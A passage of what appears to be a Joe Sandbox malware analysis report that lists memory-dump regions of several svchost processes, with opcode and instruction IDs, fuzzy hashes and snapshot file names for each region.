                                                  • Instruction Fuzzy Hash: 75715B27B18A6A8BD709BB7CBC256ED7BA0EF85324B4445B7D149C71C7CD246446C3C0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c57daddbdcfb672bc28418a032b3a1026322dfb8c1266b4774b2ca4776966ff9
                                                  • Instruction ID: baeedd8cb4a13128a41a9bbdc266b540fbb146dcae2a104647e39c427ed22bbd
                                                  • Opcode Fuzzy Hash: c57daddbdcfb672bc28418a032b3a1026322dfb8c1266b4774b2ca4776966ff9
                                                  • Instruction Fuzzy Hash: B5514621B0E68A0FE75AA77C58769B57BD1DF8622470940FBD08DC71EBDC0C68478352
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0ca06e49bf851800b20d61027b887d4092bd24e7660325eb5edaeea3be7f2ac
                                                  • Instruction ID: 37d859910dc7f8ef2bbd183105cac66da64381fb6b8301c25bee2257a5b235f5
                                                  • Opcode Fuzzy Hash: f0ca06e49bf851800b20d61027b887d4092bd24e7660325eb5edaeea3be7f2ac
                                                  • Instruction Fuzzy Hash: C5412621B19A5D9FEB49FBAC98616EDBBE1FF88310F404476D008C72C7CE24A546C780
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d707126b8652584dd4e91d9a52918df61f13285fb630456f87c37e5468a1f150
                                                  • Instruction ID: 076be108fd942c2642aa326dc56b54a0fd3bbcfc42cbae624458c5347653d14a
                                                  • Opcode Fuzzy Hash: d707126b8652584dd4e91d9a52918df61f13285fb630456f87c37e5468a1f150
                                                  • Instruction Fuzzy Hash: 9731C821B1D9490FEB98EB6C587A679A7C2EF9C315F1405BEE41EC32EBDD18AC418341
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20e5d54e07ef3175a18f8c33e7f363fcdc670f176acb889d32fc013dd67261d1
                                                  • Instruction ID: 3505d6a634e58e5ce4e3805aae65d7d82f62f4196d251b0ed064a2dbd5b4a28f
                                                  • Opcode Fuzzy Hash: 20e5d54e07ef3175a18f8c33e7f363fcdc670f176acb889d32fc013dd67261d1
                                                  • Instruction Fuzzy Hash: 7B21EA52B1D9594FEB5967BC5C3A7B86BD1EF98750F0402BAE01CC31D6DE1869414341
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45d51851309bd3049885880213be7a34293621a3546f6aac3d1f05aca403a14c
                                                  • Instruction ID: 75f5915644c8ebcd52274a6b513d209ad7494b9a9e075e91441e38c5bb0038ca
                                                  • Opcode Fuzzy Hash: 45d51851309bd3049885880213be7a34293621a3546f6aac3d1f05aca403a14c
                                                  • Instruction Fuzzy Hash: 93319320B9994D5FD348FB2CA4B68A9BF71FFC8200BC484A5D419C77CADE346942C742
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 288e33c407eb75844795e7d22496e496ab1ecaa2a59c61eee3e14576a0f8b166
                                                  • Instruction ID: 3cf06439b94778edcbfbc9b44ab589b5485c8f0f64733acbfa1b7a4f4f4c6650
                                                  • Opcode Fuzzy Hash: 288e33c407eb75844795e7d22496e496ab1ecaa2a59c61eee3e14576a0f8b166
                                                  • Instruction Fuzzy Hash: 90017B15A0E6990FEB59AB785C718757FF0DF99310B0905BBE888C71E7D908AA418382
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec2f75e429efb6f76cf7ea0b66d1eb9c10856d0bdffb807d63645f3b59387f15
                                                  • Instruction ID: efe73fa74dd170e589f084237ffbb50d94b543b2c4b7a9d0f5ff36c6d2b89227
                                                  • Opcode Fuzzy Hash: ec2f75e429efb6f76cf7ea0b66d1eb9c10856d0bdffb807d63645f3b59387f15
                                                  • Instruction Fuzzy Hash: 05E06D21F1491D4FEF44BBACA8557FCA2D2EB8C616F100177D61DC329ADE2858028381
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :M_^$k:M
                                                  • API String ID: 0-4016585720
                                                  • Opcode ID: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction ID: 002624ae95b24f00070e4224984cc128ce93d50c3f3842865c8409bf0b040c84
                                                  • Opcode Fuzzy Hash: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction Fuzzy Hash: 1801A75B7095A989D3077BADB8554ECBB90DE86339B0843F3D2C98D0839914508797C5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b11f5e29d0836b658e65815287541afc871b08c8aad991cc35aad4bd9ecc4f3
                                                  • Instruction ID: 70d044e13687e44d62943d551e9802266829c4703039b329bb930eb75edddc61
                                                  • Opcode Fuzzy Hash: 3b11f5e29d0836b658e65815287541afc871b08c8aad991cc35aad4bd9ecc4f3
                                                  • Instruction Fuzzy Hash: 36C17723B0F6994FD319A7ACBC754E8BF60EF8172574802B7D09D871D7ED28A9068391
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction ID: 1b942fa5ee171873e8579c65598d7a8563b345779fa4baa9cbc9e93a7ad423b3
                                                  • Opcode Fuzzy Hash: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction Fuzzy Hash: 9B716826B1996E8AD709BB7CBC256ED7BA0EF85324B4442B7D00DCB1C7DD24644683D0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction ID: 0940f870d55b9914233d07a66d7061904f2bc69c02174768cf0336a604369507
                                                  • Opcode Fuzzy Hash: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction Fuzzy Hash: 1B816862B0F9894FD319AB6C68754E8BF60EF4570474840FBD09D876DBED38A902C782
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction ID: 81dd880c9c9ba983e97c13f20fb0900a8cdfffccee0ea40e3e4be977ab320ac6
                                                  • Opcode Fuzzy Hash: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction Fuzzy Hash: 6B413625B19A5D9FEB48FBAC98616EC7BE1FF88300F4445B6D009C72C7DE24A542C791
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: daf2250d41d4bfa8eff4e015cca03abd1269c32249b7d4507b1669c3706c3c79
                                                  • Instruction ID: f685b8cf933d785876afbab187cc8cebc786bd89f09b6737795a8dd373f704b6
                                                  • Opcode Fuzzy Hash: daf2250d41d4bfa8eff4e015cca03abd1269c32249b7d4507b1669c3706c3c79
                                                  • Instruction Fuzzy Hash: 10314B11B1EA8A0FE7A5A7784869A753BD2EF9A61470940FAD48DC31E7DD08AC038352
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction ID: 73f409b1edb0e2a466ea2b8c30110559b8874984d12259c42338263cf9d35d62
                                                  • Opcode Fuzzy Hash: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction Fuzzy Hash: 4B21E152B19A494FE759A7B85C2A6B877D2EF98740F0403BAE00CC31D6EE1868428352
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction ID: d4a1be4dbb91d95f671ba3bb4479e002fd0361fa0f5342f78bc72855bd9b8427
                                                  • Opcode Fuzzy Hash: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction Fuzzy Hash: B7E06D21B1490D4FEF44BBACA8557FCB2D2EB8C616F1002B7D51DC329ADE2858028391
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f441501c9d5f5477b9e8a2078ac0de71ea546c9f86f4223ae14fb2b3ab5b456e
                                                  • Instruction ID: af22dc5a551fba1729b7b50c091d840657c1ab126b249e468b6f53ffaed5af9f
                                                  • Opcode Fuzzy Hash: f441501c9d5f5477b9e8a2078ac0de71ea546c9f86f4223ae14fb2b3ab5b456e
                                                  • Instruction Fuzzy Hash: 9252A621B29A5D4FE768FB7894756B9B7D2FF9C300F4405B9E05EC32D6DE28A8018781
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfb80b09dcea574c6f6e1be4886c93f6be0389ef68758cd02425701ce6851756
                                                  • Instruction ID: 196e9966820abf0049c6b08bcccb5b0426b3f43bf805a104f98be84d2775e3f2
                                                  • Opcode Fuzzy Hash: dfb80b09dcea574c6f6e1be4886c93f6be0389ef68758cd02425701ce6851756
                                                  • Instruction Fuzzy Hash: 5E51FF11B0E6C90FD796ABB85835675BFE0DF9B219B0800FBE099C71E7DD081806C382
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :L_^$k:L
                                                  • API String ID: 0-2007851088
                                                  • Opcode ID: 3ae2815b22d4748dcda899e01171a4bf352aebcfef83c12133de718c7890032d
                                                  • Instruction ID: 1e5f636febffa4ba0124d884811f75e14e4fccf51974d01fc275853f6f548afa
                                                  • Opcode Fuzzy Hash: 3ae2815b22d4748dcda899e01171a4bf352aebcfef83c12133de718c7890032d
                                                  • Instruction Fuzzy Hash: 3B012B177085A289D3077BBDB8554FCBB90DE86379B4801F3C2C98E0A7D51450CB83C6
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 247967981d37a36290cfed2e8e200d853d2c95edbdbe9ddd8a0e7e1346c3e5a8
                                                  • Instruction ID: bd34e361bda90065772161a5c7b002d741e69dae165aeff7d5f416a657d138eb
                                                  • Opcode Fuzzy Hash: 247967981d37a36290cfed2e8e200d853d2c95edbdbe9ddd8a0e7e1346c3e5a8
                                                  • Instruction Fuzzy Hash: 1C41E433F19A5A4FD755E7BCE8754ED7BB1FF4A250B4501B7D089DB1A2ED2828028780
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c490b7e9def61ab0963fc56050ce8ea54c6b00466282a4ff1cf132e7aeb4ee3c
                                                  • Instruction ID: 7f998dd9f279ff9b6d898493310df4f513d3dc5af7d0aa5ee6b2778236848bf3
                                                  • Opcode Fuzzy Hash: c490b7e9def61ab0963fc56050ce8ea54c6b00466282a4ff1cf132e7aeb4ee3c
                                                  • Instruction Fuzzy Hash: F5C16A12B1EAAA4FD319A7BCBC754E97BA0FF8136574840BBC088871E7DD286406C7D1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f3cf9259c5ed63c1fd578bb92cbecfe882494ed12acd8227acb18e04adafda0d
                                                  • Instruction ID: b177433634f5edebc30a8129766f83d9676fb7ce27bdcde7f9fca3dd96d3d91e
                                                  • Opcode Fuzzy Hash: f3cf9259c5ed63c1fd578bb92cbecfe882494ed12acd8227acb18e04adafda0d
                                                  • Instruction Fuzzy Hash: BF717826B1896A9ED70ABBBCBC619ED7BA0EF86324B4401B7C049C71D7CD24604BC7C1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02175ec92fe4e58aab529759e571ad4a6f697a31561f986baca51f10d7cc08d7